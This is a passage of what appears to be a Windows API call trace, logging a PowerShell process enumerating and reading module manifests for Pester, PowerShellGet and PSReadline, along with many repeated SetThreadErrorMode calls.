ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1124, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.md", cAlternateFileName="")) returned 1 [0280.803] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 1 [0280.803] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0280.804] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0280.804] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c850) returned 1 [0280.804] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c810) returned 1 [0280.804] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.psd1")) returned 0xffffffff [0280.804] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.psm1")) returned 0xffffffff [0280.804] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.cdxml")) returned 0xffffffff [0280.804] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.xaml")) returned 0xffffffff [0280.804] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.dll")) returned 0xffffffff [0280.804] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0x653ef8c610, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0280.804] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0280.804] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester" (normalized: "c:\\program files\\windowspowershell\\modules\\pester"), fInfoLevelId=0x0, lpFileInformation=0x653ef8cb40 | out: lpFileInformation=0x653ef8cb40*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0280.804] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0280.805] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0280.805] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0x653ef8c590, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0280.805] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\*"), lpFindFileData=0x653ef8c7c0 | out: lpFindFileData=0x653ef8c7c0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0280.805] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c780 | out: lpFindFileData=0x653ef8c780*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0280.805] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c780 | out: lpFindFileData=0x653ef8c780*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 1 [0280.805] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c780 | out: lpFindFileData=0x653ef8c780*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0280.805] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0280.805] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0280.805] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0280.805] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x105, lpBuffer=0x653ef8c680, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", lpFilePart=0x0) returned 0x43 [0280.805] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cad0) returned 1 [0280.805] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\pester.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8cbb0 | out: lpFileInformation=0x653ef8cbb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5)) returned 1 [0280.805] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca90) returned 1 [0280.806] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x105, lpBuffer=0x653ef8c390, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", lpFilePart=0x0) returned 0x43 [0280.806] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c870) returned 1 [0280.806] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\pester.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x8f4 [0280.806] GetFileType (hFile=0x8f4) returned 0x1 [0280.806] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7e0) returned 1 [0280.806] GetFileType (hFile=0x8f4) returned 0x1 [0280.806] ReadFile (in: hFile=0x8f4, lpBuffer=0x25b5c419990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8c948, lpOverlapped=0x0 | out: lpBuffer=0x25b5c419990*, lpNumberOfBytesRead=0x653ef8c948*=0x1000, lpOverlapped=0x0) returned 1 [0280.806] ReadFile (in: hFile=0x8f4, lpBuffer=0x25b5c419990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8c948, lpOverlapped=0x0 | out: lpBuffer=0x25b5c419990*, lpNumberOfBytesRead=0x653ef8c948*=0x1000, lpOverlapped=0x0) returned 1 [0280.806] ReadFile (in: hFile=0x8f4, lpBuffer=0x25b5c419990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8c948, lpOverlapped=0x0 | out: lpBuffer=0x25b5c419990*, lpNumberOfBytesRead=0x653ef8c948*=0x1000, lpOverlapped=0x0) returned 1 [0280.807] ReadFile (in: hFile=0x8f4, lpBuffer=0x25b5c419990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8c948, lpOverlapped=0x0 | out: lpBuffer=0x25b5c419990*, lpNumberOfBytesRead=0x653ef8c948*=0x5e5, lpOverlapped=0x0) returned 1 [0280.807] ReadFile (in: hFile=0x8f4, lpBuffer=0x25b5c418eb5, nNumberOfBytesToRead=0x21b, lpNumberOfBytesRead=0x653ef8c948, lpOverlapped=0x0 | out: lpBuffer=0x25b5c418eb5*, lpNumberOfBytesRead=0x653ef8c948*=0x0, lpOverlapped=0x0) returned 1 [0280.807] ReadFile (in: hFile=0x8f4, lpBuffer=0x25b5c419990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8c948, lpOverlapped=0x0 | out: lpBuffer=0x25b5c419990*, lpNumberOfBytesRead=0x653ef8c948*=0x0, lpOverlapped=0x0) returned 1 [0280.808] CloseHandle (hObject=0x8f4) returned 1 [0280.813] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.psd1")) returned 0xffffffff [0280.813] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.psm1")) returned 0xffffffff [0280.813] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.cdxml")) returned 0xffffffff [0280.813] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.xaml")) returned 0xffffffff [0280.814] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.dll")) returned 0xffffffff [0280.814] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0280.814] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0280.814] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0280.814] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0280.815] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0280.815] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0280.815] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c8c0) returned 1 [0280.815] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7f0) returned 1 [0280.815] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7b0) returned 1 [0280.815] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c8c0) returned 1 [0280.815] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7f0) returned 1 [0280.815] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7b0) returned 1 [0280.815] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c8d0) returned 1 [0280.815] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c890) returned 1 [0280.815] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c920) returned 1 [0280.816] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c850) returned 1 [0280.816] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c810) returned 1 [0280.816] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0280.817] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0280.817] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0280.817] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0280.817] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0280.817] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cad0) returned 1 [0280.817] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca90) returned 1 [0280.817] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x105, lpBuffer=0x653ef8c390, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0280.817] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c870) returned 1 [0280.817] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7e0) returned 1 [0280.821] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.psd1")) returned 0xffffffff [0280.822] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0280.822] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0280.822] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0280.822] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0280.822] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0280.822] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0280.822] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c8c0) returned 1 [0280.822] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7f0) returned 1 [0280.822] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7b0) returned 1 [0280.822] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c8c0) returned 1 [0280.823] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7f0) returned 1 [0280.823] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7b0) returned 1 [0280.823] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c730) returned 1 [0280.823] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c660) returned 1 [0280.823] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c620) returned 1 [0280.823] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c730) returned 1 [0280.823] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c660) returned 1 [0280.823] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c620) returned 1 [0280.823] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c740) returned 1 [0280.823] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c700) returned 1 [0280.823] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c790) returned 1 [0280.823] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c6c0) returned 1 [0280.823] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c680) returned 1 [0280.824] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c8d0) returned 1 [0280.824] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c890) returned 1 [0280.824] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c920) returned 1 [0280.824] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c850) returned 1 [0280.824] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c810) returned 1 [0280.824] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0280.824] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0280.824] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0280.824] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0280.824] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0280.824] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cad0) returned 1 [0280.824] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca90) returned 1 [0280.825] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", nBufferLength=0x105, lpBuffer=0x653ef8c390, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", lpFilePart=0x0) returned 0x49 [0280.825] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c870) returned 1 [0280.825] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7e0) returned 1 [0280.826] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cbf0) returned 1 [0280.826] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cbb0) returned 1 [0280.826] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cc40) returned 1 [0280.826] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cb70) returned 1 [0280.826] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cb30) returned 1 [0280.827] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cbe0) returned 1 [0280.830] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cb10) returned 1 [0280.830] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cad0) returned 1 [0280.830] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cbe0) returned 1 [0280.831] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cb10) returned 1 [0280.831] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cad0) returned 1 [0280.831] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0280.831] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0280.831] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0280.831] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0280.831] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0280.831] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0280.831] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0280.831] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0280.831] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0280.832] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0280.832] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0280.832] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0280.832] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0280.832] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0280.833] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0280.833] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0280.833] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0280.833] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0280.833] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0280.833] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0280.833] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0280.833] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0280.833] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0280.833] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0280.833] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0280.833] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0280.834] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0280.834] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0280.834] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0280.834] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0280.834] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0280.834] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0280.834] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0280.834] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0280.834] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0280.834] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0280.834] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0280.834] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0280.834] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0280.834] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0280.835] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0280.835] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0280.835] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0280.835] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0280.835] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0280.835] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0280.835] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0280.835] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0280.835] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0280.835] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0280.835] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0280.835] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0280.835] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0280.836] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0280.836] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0280.836] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0280.837] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0280.837] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0280.837] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0280.837] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0280.837] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0280.837] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0280.837] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0280.837] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0280.837] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0280.837] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0280.837] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0280.838] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0280.838] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0280.838] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0280.838] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0280.838] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0280.838] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0280.838] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0280.838] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0280.838] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0280.838] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0280.838] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0280.839] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0280.839] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0280.839] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0280.839] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0280.839] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0280.839] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0280.839] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0280.839] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 